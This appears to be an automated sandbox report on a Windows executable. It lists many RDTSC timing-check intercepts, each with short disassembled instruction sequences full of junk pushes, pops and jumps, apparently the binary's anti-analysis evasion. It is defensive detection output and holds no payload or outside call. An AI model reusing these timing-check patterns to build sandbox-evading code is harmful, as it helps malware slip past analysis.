Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC5077 second address: CC507B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC507B second address: CC510C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jl 00007F0D5D34597Ch 0x00000012 pop eax 0x00000013 mov dword ptr [ebp+122D19C2h], ebx 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D3696h] 0x00000021 push 00000000h 0x00000023 push 00000003h 0x00000025 call 00007F0D5D345979h 0x0000002a push edx 0x0000002b jmp 00007F0D5D34597Bh 0x00000030 pop edx 0x00000031 push eax 0x00000032 jg 00007F0D5D34598Eh 0x00000038 push edi 0x00000039 jmp 00007F0D5D345986h 0x0000003e pop edi 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jmp 00007F0D5D345980h 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b jmp 00007F0D5D345981h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 pushad 0x00000056 push edi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC510C second address: CC5176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jne 00007F0D5D4BD016h 0x0000000c jmp 00007F0D5D4BD027h 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F0D5D4BD018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e cld 0x0000002f or dword ptr [ebp+122D19C2h], esi 0x00000035 lea ebx, dword ptr [ebp+12459DD3h] 0x0000003b add esi, dword ptr [ebp+122D37D6h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0D5D4BD020h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC5176 second address: CC5190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D345986h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC53A9 second address: CC53D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jo 00007F0D5D4BD024h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC53D1 second address: CC53D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC53D5 second address: CC540E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jne 00007F0D5D4BD034h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC540E second address: CC5412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CC54DD second address: CC5520 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F0D5D4BD016h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 js 00007F0D5D4BD022h 0x00000016 jne 00007F0D5D4BD01Ch 0x0000001c pop eax 0x0000001d sbb cx, A35Fh 0x00000022 lea ebx, dword ptr [ebp+12459DE7h] 0x00000028 mov edx, dword ptr [ebp+122D3762h] 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0D5D4BD01Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CD5C60 second address: CD5C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5A09 second address: CE5A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE3F27 second address: CE3F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4306 second address: CE4318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0D5D4BD016h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4318 second address: CE4338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F0D5D34598Fh 0x0000000b jmp 00007F0D5D345983h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4627 second address: CE462D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE462D second address: CE463C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F0D5D345976h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE463C second address: CE4648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F0D5D4BD016h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4648 second address: CE4652 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D5D345976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE47F1 second address: CE480F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F0D5D4BD01Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE480F second address: CE4844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0D5D345981h 0x0000000b popad 0x0000000c je 00007F0D5D3459A4h 0x00000012 jmp 00007F0D5D345984h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4966 second address: CE4970 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D5D4BD016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB0970 second address: CB0974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB0974 second address: CB097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB097A second address: CB098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F0D5D34597Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE4ADB second address: CE4AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE525C second address: CE5266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0D5D345976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5266 second address: CE5291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0D5D4BD01Fh 0x00000011 js 00007F0D5D4BD016h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5291 second address: CE529C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0D5D345976h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE529C second address: CE52D0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D5D4BD01Ch 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0D5D4BD024h 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007F0D5D4BD016h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE52D0 second address: CE52D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5419 second address: CE5431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D4BD024h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5431 second address: CE5441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0D5D345976h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CE5441 second address: CE5445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEB824 second address: CEB829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEB829 second address: CEB84C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D5D4BD018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F0D5D4BD02Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0D5D4BD01Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEA321 second address: CEA32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0D5D345976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEA32B second address: CEA32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEBBD7 second address: CEBBDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CEBBDB second address: CEBBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CBC44F second address: CBC46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D345984h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF167A second address: CF168D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF168D second address: CF1691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF1691 second address: CF1697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF1C82 second address: CF1C9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345985h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF1C9B second address: CF1CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0D5D4BD016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF58FB second address: CF5905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0D5D345976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5A1B second address: CF5A2C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D5D4BD016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5BC4 second address: CF5BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5BC8 second address: CF5BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5CF0 second address: CF5CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5CF4 second address: CF5CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5CFA second address: CF5D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D345986h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF5DE2 second address: CF5DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6308 second address: CF630C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF630C second address: CF6312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF644E second address: CF6452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6452 second address: CF645F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF645F second address: CF6463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6463 second address: CF646D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF646D second address: CF6471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6612 second address: CF6616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6616 second address: CF661C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6726 second address: CF6731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0D5D4BD016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF684E second address: CF6858 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D5D34597Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6858 second address: CF6864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6864 second address: CF6869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6869 second address: CF6893 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D5D4BD01Ch 0x00000008 je 00007F0D5D4BD016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1DCBh], ebx 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0D5D4BD020h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF6893 second address: CF68AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF68AF second address: CF68B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF68B3 second address: CF68B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF68B9 second address: CF68BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF7881 second address: CF78CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007F0D5D34597Ch 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 mov esi, 347167CDh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F0D5D345978h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 jne 00007F0D5D345976h 0x0000003d push 00000000h 0x0000003f xor esi, 7111D16Bh 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF7743 second address: CF7747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF78CF second address: CF78D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF7747 second address: CF7753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF9431 second address: CF9437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF9437 second address: CF943B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFC9FE second address: CFCA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFCA04 second address: CFCA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFCA10 second address: CFCA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFCA14 second address: CFCA1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFBC74 second address: CFBC7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFED25 second address: CFED34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFED34 second address: CFED38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFED38 second address: CFED42 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D5D4BD016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFED42 second address: CFED4C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D5D34597Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFC71A second address: CFC71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFFC18 second address: CFFC44 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D5D345976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D5D345986h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F0D5D345978h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
